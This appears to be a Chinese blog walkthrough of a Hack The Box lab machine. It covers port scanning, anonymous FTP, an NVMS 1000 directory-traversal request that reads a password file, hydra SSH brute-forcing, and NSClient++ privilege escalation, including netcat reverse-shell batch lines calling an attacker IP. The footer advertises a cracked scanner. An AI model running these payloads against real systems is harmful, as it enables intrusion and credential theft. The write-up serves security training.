扫描主机开放端口

sudo nmap -sC -sV -sS 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 02:32 EDT
Nmap scan report for 10.10.10.184
Host is up (0.35s latency).
Not shown: 990 closed ports
PORT      STATE    SERVICE        VERSION
21/tcp    open     ftp            Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open     ssh            OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp    open     http
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
5666/tcp  open     tcpwrapped
6699/tcp  open     napster?
8443/tcp  open     ssl/https-alt
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|     jobs
|   HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|_    Document not found
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
32772/tcp filtered sometimes-rpc7
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=4/18%Time=5E9A9FA3%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=4/18%Time=5E9A9FB4%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x1
SF:8\x0c\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x
SF:2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x204
SF:04\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPOpti
SF:ons,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20no
SF:t\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 2m46s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-04-18T06:39:45
|_  start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 299.07 seconds

通过上面的扫描，我们发现FTP可以进行匿名(Anonymous)访问，我们尝试登录

获取FTP中的文件

kali@kali:~$ ftp
ftp> open 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:08PM                  174 Confidential.txt
ge226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
174 bytes received in 0.28 secs (0.6031 kB/s)
ftp> cd ../
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
cd Nathan226 Transfer complete.
ftp> cd Nathan
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
186 bytes received in 0.33 secs (0.5584 kB/s)

查看Confidential.txt和Notes to do.txt的内容
Confidential.txt

Nathan,I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.RegardsNadine

Notes to do.txt

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

访问80端口

我们尝试使用admin：admin登录，失败了，尝试使用Nadine：Nathan也没有登录成功

但是这是一个webpanle，尝试在kali中使用searchspolit中搜索NVMS 1000

searchsploit NVMS 1000

我们查看关于这个程序漏洞的利用说明，可以看出，这一一个文件包含漏洞

cat /usr/share/exploitdb/exploits/hardware/webapps/47774.txt

使用BurpSuit装包进行拦截利用

在Confidential.txt中有一句话：I left your Passwords.txt file on your Desktop.
我们尝试包含桌面Passwords.txt文件,得到一些密码

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: dataPort=undefinde
Upgrade-Insecure-Requests: 1

ResponseHTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

创建一个用户名和密码字典

使用hydra进行爆破SSH账户

hydra -L users.txt -P passwords.txt 10.10.10.184 ssh

得到账户密码

host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk

登录SSH

查看用户权限

回头再看我们Nmap的扫描结果，发现有一个8443的端口也运行web服务

我们发现是个NSClient++的程序，使用Searchsoplit搜索一下，看有没有可利用的

查看利用方法

Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file.  From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.The user is able to enable the modules to check external scripts and schedule those scripts to run.  There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere.  Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation.  A reboot, as far as I can tell, is required to reload and read the changes to the web config.Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget passwordC:\Program Files\NSClient++>nscp web -- password --displayCurrent password: SoSecret2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler3. Download nc.exe and evil.bat to c:\temp from attacking machine@echo offc:\temp\nc.exe 192.168.0.163 443 -e cmd.exe4. Setup listener on attacking machinenc -nlvvp 4435. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New- foobarcommand = c:\temp\evil.bat6. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new- foobarinterval = 1mcommand = foobar7. Restart the computer and wait for the reverse shell on attacking machinenc -nlvvp 443listening on [any] 443 ...connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671Microsoft Windows [Version 10.0.17134.753](c) 2018 Microsoft Corporation. All rights reserved.C:\Program Files\NSClient++>whoamiwhoamint authority\systemRisk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local Syste

我们先获取NSClient的密码

type nsclient.ini

密码：ew2x6SsGTxjRwXOT

但是发现，只允许127.0.0.1去连接，所以我们通过SSH进行端口转发

ssh -L 9000:127.0.0.1:8443 nadine@10.10.10.184

访问https://127.0.0.1:9000

我们继续尝试做CVE中的第2，3，4步，上传nc和evilshell.bat。
Evilshell.bat内容

@echo off
C:\Temp\nc.exe 10.10.14.52 4444 -e cmd.exe

10.10.10.14.52是我们本机的IP地址
我们继续回到网页中，在Settings页面Scripts中添加新的脚本

key = foobar
value = c:\temp\evilshell.bat

在Settings > Scheduler > Schedules > 中添加脚本

我们在Kali中使用nc进行监听

nc -lvp

我们点击菜单栏中的Control，等待大约1min左右，就会反弹回来一个shell
查询权限，可以看到是system权限

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec